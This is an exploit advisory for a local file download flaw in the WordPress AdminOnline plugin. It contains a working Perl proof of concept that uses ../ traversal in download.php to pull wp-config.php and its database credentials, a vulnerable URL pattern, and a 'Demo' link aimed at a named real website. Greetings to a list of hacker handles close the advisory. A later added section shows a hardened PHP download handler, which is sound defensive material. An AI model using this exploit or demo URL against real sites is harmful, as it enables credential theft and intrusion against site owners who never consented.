WordPress AdminOnline plugin suffers from a local file disclosure vulnerability.
20c692d7751807177e345335572951873758bd2fa6401da41ae11db57ed96e9b
GGGGGGGGGGGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB
GGG::::::::::::G H:::::::H H:::::::H B::::::::::::::::B
GG:::::::::::::::G H:::::::H H:::::::H B::::::BBBBBB:::::B
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::B B:::::B
G:::::G GGGGGG H:::::H H:::::H B::::B B:::::B
G:::::G H:::::H H:::::H B::::B B:::::B
G:::::G H::::::HHHHH::::::H B::::BBBBBB:::::B
G:::::G GGGGGGGGGG H:::::::::::::::::H B:::::::::::::BB
G:::::G G::::::::G H:::::::::::::::::H B::::BBBBBB:::::B
G:::::G GGGGG::::G H::::::HHHHH::::::H B::::B B:::::B
G:::::G G::::G H:::::H H:::::H B::::B B:::::B
G:::::G G::::G H:::::H H:::::H B::::B B:::::B
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::BBBBBB::::::B
GG:::::::::::::::G H:::::::H H:::::::H B:::::::::::::::::B
GGG::::::GGG:::G H:::::::H H:::::::H B::::::::::::::::B
GGGGGG GGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB
Grey Hat Boy
[+] Title : Wordpress adminonline Plugin Local File Download
[+] Discovered By : Medrik
[+] CMS Home-Page : http://wordpress.org
[+] Found Date : 2014-06-11
[+] Tested On : Windows
###################################
With this vulnerability an attacker can download arbitrary local files from the target server.
This is a local file download (LFD) vulnerability in:
File : download.php
Parameter : file
########[ Simple Perl Poc ]########
use strict;
use warnings;
use LWP::Simple;

my $target   = 'your target here';   # e.g. http://host (no trailing slash)
# download.php appends the file parameter to a base path without validation,
# so "../" sequences walk up to the WordPress root
my $confPath = '/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php';
my $req      = get($target . $confPath);   # undef on HTTP error

if (defined $req && $req =~ /package WordPress/) {
    print "\n Downloading Config ...";
    open(my $config, '>', 'wp-config.txt') or die "Cannot write wp-config.txt: $!";
    print $config $req;
    close($config);
    print "\n $target Config Downloaded To File : wp-config.txt !\n";
}
########[ End Perl Code ]########
Vulnerable URL pattern :
http://Vulnerable_Host/wp-content/plugins/adminonline/product/download.php?file=[LFD]
Demo :
http://www.cocl.ca/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php
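For comparison, here is a hardened download handler, added as an example and not taken from the AdminOnline plugin: it confines the file parameter to a single allow-listed directory, so the ../../../../wp-config.php request above resolves to nothing and the handler fails closed. The directory name product/files and the helper resolve_download_path are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's own code. The vulnerable pattern the advisory
// describes amounts to:
//     readfile(__DIR__ . '/' . $_GET['file']);
// which lets "../" walk out of the plugin directory. The version below
// validates the name and the resolved path before reading anything.

declare(strict_types=1);

// Assumed location of the downloadable files (not the plugin's real layout).
const PRODUCT_DIR = __DIR__ . '/product/files';

/**
 * Resolve $requested inside $baseDir and return the canonical path, or null
 * when the name is malformed, the file is missing, or the resolved path
 * escapes the base directory.
 */
function resolve_download_path(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory missing: fail closed
    }

    // Accept plain file names only: no slashes, backslashes or NUL bytes.
    // This alone already rejects every "../" traversal attempt.
    if ($requested === '' || strpbrk($requested, "/\\\0") !== false) {
        return null;
    }

    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }

    // Defence in depth: realpath() has followed symlinks, so confirm the
    // final target still sits below the base directory.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    return $candidate;
}

$requested = isset($_GET['file']) ? (string) $_GET['file'] : '';
$path = resolve_download_path(PRODUCT_DIR, $requested);

if ($path === null) {
    // Same response for "traversal", "bad name" and "no such file": do not
    // tell the client which check failed.
    http_response_code(404);
    exit('File not found.');
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

Inside a real WordPress plugin the same handler would additionally check that the request is authorised (for example with current_user_can() and a nonce) before serving anything; the path check above is only the part that closes the traversal.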
Gr33tz : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT , Enddo ,
Explo!ter , YoSeF__HaCkeR , Moji_RideR , E2MA3N - S!Y0U.T4r.6T - 0x0ptim0us - ARTA And All My Friends .